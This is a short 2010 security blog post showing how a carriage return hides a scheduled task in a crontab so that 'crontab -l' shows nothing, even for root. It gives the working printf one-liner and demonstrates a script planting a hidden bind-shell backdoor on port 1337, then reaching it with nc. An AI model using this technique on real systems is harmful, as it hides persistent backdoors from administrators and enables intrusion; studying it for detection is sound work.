Crontab: How to hide a scheduled task

Sun, 18 Jul 2010 17:39:02 +0200
Tags: security

Here is an easy way to hide a task inside a crontab by using the carriage return character ('\r'), example (using cron version 3.0pl1-109):

$ crontab -l
no crontab for alice
$ printf "* * * * * >/tmp/x;\rno crontab for $USER\n" | crontab -

// new task (command ">/tmp/x") is hidden
$ crontab -l
no crontab for alice

// and it also looks hidden for root
# crontab -l -u alice
no crontab for alice

[ and one minute later ... ]

# ls -l /tmp/x
-rw-r--r-- 1 alice alice 0 juin   2 22:27 /tmp/x

From a security point of view, it could be used to hide entries. Here is a small script (cron-hide-task.sh) that hides a shell backdoor into an existing cron table (preserving the actual tasks):

// cron table isn't empty
bob@victim$ crontab -l
0 3 * * * /bin/true >/dev/null 2>&1
30 4 * * * /bin/false >/dev/null 2>&1

// execute the code to hide the backdoor
bob@victim$ bash ./cron-hide-task.sh
Backdoor is now hidden in cron table
Shell will be bound on port 1337.

// new task is hidden
bob@victim$ crontab -l
0 3 * * * /bin/true >/dev/null 2>&1 
30 4 * * * /bin/false >/dev/null 2>&1

[ and one minute later from another box ... ]

// connection to our backdoor
$ echo "whoami" | nc victim 1337
bob

Update (2016/01/26): This nice post from Federico Bento illustrates how to hide information with escape sequences in commonly used tools (head, tail, curl, wget, etc.). Thanks to him for pointing me this out.